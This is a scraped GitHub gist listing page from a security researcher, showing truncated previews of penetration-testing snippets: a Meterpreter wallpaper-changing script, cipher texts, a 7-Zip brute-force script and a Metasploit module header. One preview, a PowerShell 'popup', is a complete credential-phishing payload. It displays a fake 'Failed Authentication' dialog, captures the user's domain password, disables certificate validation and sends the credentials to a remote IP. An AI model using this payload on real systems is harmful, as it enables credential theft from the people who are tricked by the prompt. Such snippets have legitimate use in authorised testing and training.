Skip to content

Instantly share code, notes, and snippets.

View mubix's full-sized avatar
🎯
Focusing

Rob Fuller mubix

🎯
Focusing
View GitHub Profile
@mubix
mubix / wallpaper.rb
Created August 19, 2015 07:32
Wallpaper Script from Metasploit Minute
#Change Wallpaper
session = client
key = "HKCU"
wallpaper = "kerby.bmp"
based = "/root/kerby.bmp"
# based = File.join(Msf::Config.install_root, "data", wallpaper)
bgcolor = "0 0 0" # set to 255 255 255 for white
refresh_cmd = "rundll32.exe user32.dll, UpdatePerUserSystemParameters"

Cipher Text #1:

214611044b181b161b040341061a000048150f0005554b5558514712031a061648080941060c520609130204195b522c4f170241071a011148000b0c040606455b5157410c141f001b4f47535d55060c050414412252040048030204055506171d1213040f55060a4815060a0e55060d0d41000006105212010f090805125216000e13410a1b1645050814120e115c45214611044b13130c0404034104031717480009054b1a04001a41060f0f551d130d1347000c141b0b48080941060c52090107024f4b341c0148150f001f551b1648160f184b3c52161d0204040e115c

Cipher Text #2:

200e0c041255000004080008041b0145090f03410a1b110c0d0f13411c101315070f14410a071745060e47121e170111011512150e55140a1a4106410c1a1d0148030b001801171748001341121a071748120e050e59520e010549
<#----------------------------------------------------------------------------------------------------
Release Notes:
v1.4:
Author: Jared Poeppelman, Microsoft
First version published on TechNet Script Gallery
----------------------------------------------------------------------------------------------------#>
function Test-Command
{
@mubix
mubix / powershellpopup.ps1
Created January 12, 2015 20:22
Powershell Popups, proxy aware and auth aware
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
@mubix
mubix / get_rss.rb
Created December 23, 2014 14:52
Parse Site List for RSS
#!/usr/bin/env ruby
require 'feedbag'
require 'net/http'
source = Net::HTTP.get('ddosattackprotection.org', '/blog/cyber-security-blogs/')
body = source.split('"')
rss = []
body.each_with_index do |ob, index|
@mubix
mubix / 7zbrute.rb
Created November 4, 2014 16:07
7zip Cracking on the cheap
#!/usr/bin/env ruby
# Need some help with this cracking script.
# Problems:
# 1) Slow, going through a large list like Rockyou takes forever
# 2) If there is no header encryption, 7z extracts to the target location
# then tries to decrypt, so threading would be painful
# 3) I need to know when the correct password is used and due to #2
# with threading that would be very difficult.
##
# This module requires Metasploit: http//metasploit.com/donload
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Reank = NormalRanking
@mubix
mubix / milkman.cpp
Last active May 7, 2017 19:42
Milkman
#ifndef UNICODE
#define UNICODE
#endif
#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <Psapi.h>
@mubix
mubix / browserloop.js
Created July 23, 2014 18:28
Fun with NodeJS
var http = require('http');
function parseSwitch(req){
var list = {},
rc = req.headers.cookie;
rc && rc.split(';').forEach(function( cookie ) {
var parts = cookie.split('=');
list[parts.shift().trim()] = unescape(parts.join('='));
});
return list;
@mubix
mubix / watir-screen.rb
Created May 2, 2014 03:58
Screenshotting w/ Selenium and Burp
#!/usr/bin/env ruby
require 'watir-webdriver'
def screenshot(url)
b = Watir::Browser.new
b.goto url
filename = url
if filename =~ /:\/\//
filename = filename.split('://')[1]